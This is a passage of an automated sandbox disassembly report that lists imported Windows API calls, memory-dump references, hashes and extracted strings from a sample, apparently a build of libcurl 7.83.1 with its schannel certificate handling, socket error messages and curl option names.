                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024D9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024EB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E024FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0250F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02521
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02533
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02545
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02557
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0256C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0257E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02590
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025A2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025B4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025C6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025D8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025EA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E025FC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0260E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02620
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0263D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0264F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02661
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0267F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0268C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02699
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026D1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026E3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E026F5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02707
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02719
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0272B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0273D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0274F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02761
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02773
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02785
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02797
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027A9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027BB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027CD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E027F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02806
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02818
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0282A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0283C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0284E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02860
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02872
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02884
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02896
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028A8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028BA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028CC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028DE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E028F0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02902
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02917
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02929
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0293B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0294A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E029D9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E029EB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E029FD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02A0F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02A21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E02A33
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 1c390634fd37a256f4a76de48cbb1b86579d067c2b52dd15b710a27e4be96496
                                    • Instruction ID: 1a5aecede946716c33201d2bb4136b6411f974e03f8788ea69ee97ee4a076599
                                    • Opcode Fuzzy Hash: 1c390634fd37a256f4a76de48cbb1b86579d067c2b52dd15b710a27e4be96496
                                    • Instruction Fuzzy Hash: B4F12E7A602F12EFCB4A5FA1D858A89FB71BF08702F008606F92D66221CB352575DFC5
                                    APIs
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000000,?,0000001F), ref: 00E43B39
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,USE_STRONG_CRYPTO,00000011,0000001F), ref: 00E43B59
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,SCH_USE_STRONG_CRYPTO,00000015,?,?,?,0000001F), ref: 00E43B6E
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E43B8E
                                      • Part of subcall function 00E43B1A: ___from_strstr_to_strchr.LIBCMT ref: 00E4345C
                                      • Part of subcall function 00E43B1A: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 00E4349C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrstrncmp$strncpystrtol
                                    • String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$SCH_USE_STRONG_CRYPTO$USE_STRONG_CRYPTO
                                    • API String ID: 3873730638-2313236003
                                    • Opcode ID: d659c02b8d0312cba315c5ef081b3d93cda04dd246483d95afd9f05000187aa1
                                    • Instruction ID: 5a7615c203fcad02b900c1073f18a8364f093268007a9ed93f76f0a22b49f820
                                    • Opcode Fuzzy Hash: d659c02b8d0312cba315c5ef081b3d93cda04dd246483d95afd9f05000187aa1
                                    • Instruction Fuzzy Hash: D8114832B41F106BD7395A35BC95B96778CCF417ADF102025ED05FA682E7608F4182C5
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0A600
                                    • ioctlsocket.WS2_32(?,8004667E,?), ref: 00E0A637
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0A641
                                    • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00E0A649
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_errnoioctlsocketstrerror
                                    • String ID: %s%c%s$0kv@qv@/lv$://$CURLOPT_BUFFERSIZE$CURLOPT_INTERLEAVEDATA$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_PROXY$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_TCP_FASTOPEN$CURLOPT_TCP_NODELAY$CURLOPT_URL$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XOAUTH2_BEARER$Ph'$Pl$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$V;J$VLI$V[J$ViI$VI$VJ$fcntl failed on fd=%d: %s$h+N$h,N$h0"$ht'$http://$https://$proxy support is disabled in this libcurl$k%$wJ
                                    • API String ID: 1657940537-1709016624
                                    • Opcode ID: f8cfe1daa819f34ff9f451f71aae789f0ebd6458bb11fa59fa1f615c93735b2a
                                    • Instruction ID: 38df11a7c0f54d244b218fd7dbaa18a6139d01d9ff8611d0f96ac8b3309c9ce3
                                    • Opcode Fuzzy Hash: f8cfe1daa819f34ff9f451f71aae789f0ebd6458bb11fa59fa1f615c93735b2a
                                    • Instruction Fuzzy Hash: 7E110671A017099FEF089F70DD55AAC7BB1FF45319F186029E805F60D2DB359CC58A42
                                    APIs
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Host not found,000000FF,?,00E1A10B), ref: 00E19EF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncpy
                                    • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                    • API String ID: 3301158039-3442644082
                                    • Opcode ID: df247525194e90a5083d25bff3a5d3755ccf6bbb4cc3fcab5e8fba7f1d1e0264
                                    • Instruction ID: 62532a780c86040949ab71623f91f0620bc0225a38437c8f47edaa166d22f8e6
                                    • Opcode Fuzzy Hash: df247525194e90a5083d25bff3a5d3755ccf6bbb4cc3fcab5e8fba7f1d1e0264
                                    • Instruction Fuzzy Hash: 3D41643168C241928738C57CA63A1F195D4EB91381B28726EB443FB79FD153EEC2B752
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00E4E702
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4E766
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EB75
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EBBD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
                                    • API String ID: 1294909896-2896079655
                                    • Opcode ID: 797174f978c488318a700aa764dbbb15176f1aeb982c08b08c886c1c5a76ae95
                                    • Instruction ID: 80638a2324ed68e9b692f165a667a6faa690abd8ac633c1e4d3648b03f7a443a
                                    • Opcode Fuzzy Hash: 797174f978c488318a700aa764dbbb15176f1aeb982c08b08c886c1c5a76ae95
                                    • Instruction Fuzzy Hash: 29E1C0316483169FD728AB20F89592FB7D5FF84764F14992EE845B3351EB709C088B92
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0688D
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E068A1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00E068C1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E068F7
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0691B
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0697E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06988
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00E58DD4), ref: 00E0699E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E069DA
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E069E6
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E06A30
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06A7A
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06A96
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E06AC9
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E06AD9
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E06AF9
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E58DD4), ref: 00E06B14
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E06B7F
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E06BD0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E06C50
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E06C58
                                    Similarity
                                    • API ID: __acrt_iob_func$_strdup$free$___from_strstr_to_strchrfclosefopenmalloc
                                    • String ID: %.*s=%s$Couldn't read data from file "%s", this makes an empty POST.$f
                                    APIs
                                    • CertOpenStore.CRYPT32(00000002,00000000,00000000,00002000,00000000), ref: 00E4F4D6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F4E7
                                    • CertCreateCertificateChainEngine.CRYPT32(?,?), ref: 00E4F5D8
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F5E3
                                    • CertGetCertificateChain.CRYPT32(?,?,00000000,?,00000010,00000000,00000000,?), ref: 00E4F698
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F6A3
                                    • CertFreeCertificateChainEngine.CRYPT32(00000000), ref: 00E4F7C1
                                    • CertCloseStore.CRYPT32(?,00000000), ref: 00E4F7D4
                                    • CertFreeCertificateChain.CRYPT32(00000000), ref: 00E4F7E9
                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00E4F7FE
                                    Strings
                                    • schannel: failed to create certificate chain engine: %s, xrefs: 00E4F5F8
                                    • schannel: CertGetCertificateChain error mask: 0x%08x, xrefs: 00E4F739
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 00E4F6F6
                                    • (memory blob), xrefs: 00E4F540
                                    • schannel: Failed to read remote certificate context: %s, xrefs: 00E4F7A4
                                    • schannel: failed to create certificate store: %s, xrefs: 00E4F4FC
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 00E4F729
                                    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00E4F4B8
                                    • schannel: CertGetCertificateChain failed: %s, xrefs: 00E4F6B8
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 00E4F71D
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 00E4F711
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 00E4F705
                                    Similarity
                                    • API ID: Cert$Certificate$Chain$ErrorFreeLast$EngineStore$CloseContextCreateOpen
                                    • String ID: (memory blob)$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain engine: %s$schannel: failed to create certificate store: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E43177
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E431BB
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E431CC
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E431E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4324F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E43278
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E4328B
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E4329F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E432B3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E43337
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$free
                                    • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.83.1%sQUIT$CLIENT libcurl 7.83.1DEFINE %s %sQUIT$CLIENT libcurl 7.83.1MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                    APIs
                                    • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 00E4463C
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E44643
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E447FA
                                    • inet_pton.WS2_32(00000002,?,?), ref: 00E44823
                                    • inet_pton.WS2_32(00000017,?,?), ref: 00E4483C
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4497C
                                    Strings
                                    • ntdll, xrefs: 00E44637
                                    • Failed to set SNI, xrefs: 00E447E5
                                    • http, xrefs: 00E44875
                                    • schannel: SNI or certificate check failed: %s, xrefs: 00E44A52
                                    • schannel: using IP address, SNI is not supported by OS., xrefs: 00E44846
                                    • wine_get_version, xrefs: 00E44632
                                    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00E44B1F
                                    • schannel: unable to allocate memory, xrefs: 00E4498F
                                    • http/1.1, xrefs: 00E44859
                                    • schannel: initial InitializeSecurityContext failed: %s, xrefs: 00E44A38, 00E44A6F
                                    • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 00E4461C
                                    • /1.1, xrefs: 00E4487F
                                    • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00E44B07
                                    • ALPN: offers %s, xrefs: 00E4485E
                                    Similarity
                                    • API ID: inet_pton$AddressHandleModuleProc_strdupcalloc
                                    • String ID: /1.1$ALPN: offers %s$Failed to set SNI$http$http/1.1$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00E0115C
                                      • Part of subcall function 00E1027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,00E010B6), ref: 00E1028E
                                      • Part of subcall function 00E1027A: __alldvrm.LIBCMT ref: 00E102A7
                                      • Part of subcall function 00E1027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E102D1
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E010C7
                                    • _localtime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 00E01116
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E56C58), ref: 00E0117D
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00E01210
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00E01221
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000001,?), ref: 00E012D3
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,?), ref: 00E01321
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00E01361
                                    Similarity
                                    • API ID: __acrt_iob_funcfwrite$CounterPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_localtime64_time64fopen
                                    • String ID: %02d:%02d:%02d.%06ld $%s%s $%s== Info: %.*s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$Failed to create/open output$[%zu bytes data]$|l
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3FAC5
                                    • WSACreateEvent.WS2_32 ref: 00E3FB36
                                    • WSAGetLastError.WS2_32 ref: 00E3FB46
                                    • WSAEventSelect.WS2_32(?,00000000,00000021), ref: 00E3FB69
                                    • WSACloseEvent.WS2_32(00000000), ref: 00E3FB75
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00E3FB84
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00E3FB97
                                    • WaitForMultipleObjects.API-MS-WIN-CORE-SYNCH-L1-2-1(00000001,?,00000000,00000064), ref: 00E3FBD6
                                    Similarity
                                    • API ID: Event$CloseCreateErrorFileHandleLastMultipleObjectsSelectTypeWaitcalloc
                                    • String ID: $Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sha256//,00000008), ref: 00E27907
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27936
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27994
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E58DD4), ref: 00E27AA3
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 00E27ABA
                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E27ACE
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 00E27ADF
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27B16
                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00E27B2E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27BB6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27BC8
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E27BCE
                                    Similarity
                                    • API ID: free$fseekmalloc$fclosefopenfreadftellstrncmp
                                    • String ID: public key hash: sha256//%s$;sha256//$sha256//$xk
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E02082
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E020CA
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E020DD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,out of memory,?,?,?,?,?,00E0184E), ref: 00E020F9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E0184E), ref: 00E0211F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E0184E), ref: 00E0212A
